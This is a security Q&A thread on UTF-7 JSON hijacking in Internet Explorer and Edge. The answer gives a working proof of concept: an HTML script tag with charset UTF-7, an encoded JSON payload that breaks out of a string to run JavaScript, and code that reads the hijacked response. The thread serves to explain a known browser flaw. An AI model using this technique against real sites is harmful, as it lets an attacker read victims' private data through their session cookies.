# UTF-7 JSON hijacking on Microsoft IE and Edge

Tags: web-application

After some research, I saw an answer on StackOverflow saying that it's still possible to perform a UTF-7 JSON hijack using Microsoft IE and Edge browsers. If yes how can it be done? I really need an explanation about this or a working proof of concept.

Comment: It would help if you referenced the actual question you are talking about. If you mean this question: http://stackoverflow.com/questions/16289894/is-json-hijacking-still-an-issue-in-modern-browsers then the accepted answer has a PoC.

Comment: @schroeder I think the OP is talking about UTF-7 XSS: http://security.stackexchange.com/questions/47489/utf-7-xss-attacks-in-modern-browsers, since he mentioned UTF-7. The link you found is about JSON hijacking by modifying prototypes.

Comment: @FranklinYu but that question is not on StackOverflow ...

Comment: @schroeder Yes, I didn't mean that the question I linked was the one OP encountered. I meant he might be searching for such a topic. I can't find anything about the topic on StackOverflow, and I think OP might benefit reading the Q&A. Anyway, who knows, OP hasn't shown up since August.

Answer (score 3):

I assume you're referring to [this comment](https://stackoverflow.com/questions/16289894/is-json-hijacking-still-an-issue-in-modern-browsers#comment60503209_16880162), "Microsofts IE and Edge are still vulnerable to the UTF-7 JSON Hijacking though."

Following the instructions from [this 2011 blog post on JSON Hijacking](http://www.thespanner.co.uk/2011/05/30/json-hijacking/), I reproduced the problem with Microsoft Edge 20 and IE11.

Create an HTML file like this:

```
<html>
<body>
<script src="x.json" charset="UTF-7"></script>
```

And an `x.json` file like this:

```
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]
```

In the UTF-7 encoding, that apparently decodes to:

```
[{'friend':'luke','email':''}];alert(‘May the force be with you’);[{'job':'done'}]
```

And then, given the power to execute JavaScript in the context of the response, you can write more/other evil code, e.g. code to read the rest of the response. For example:

```
[{'friend':'luke','email':''}, 1].sort(function(x,y) {
for (var o in x) {
alert(o + “:” + x[o]);
}
});
setTimeout(function() {
var x = data[0];
for (var o in x) {
alert(o + “:” + x[o]);
}
}, 100);var data=[{'job':'done'}];
```

Read [the blog post](http://www.thespanner.co.uk/2011/05/30/json-hijacking/) for more details about the implications of this, but the idea is that you'd get a user to open a page on your site, make this script request (which would use the victim's cookie credentials), and then JSON hijack it to read a partial list of the user's friends.

Comment: I think a key point here is that you need to be able to set some of the data you're getting.  If you are one of the victims friends, for instance...

Comment: I did this in 2010 at https://www.reddit.com/r/programming/comments/b7ebd/json_sniffing_with_utf7_injections_will_only_work/ and https://web.archive.org/web/20100304213300/http://code.eligrey.com/poc/json-hijacking/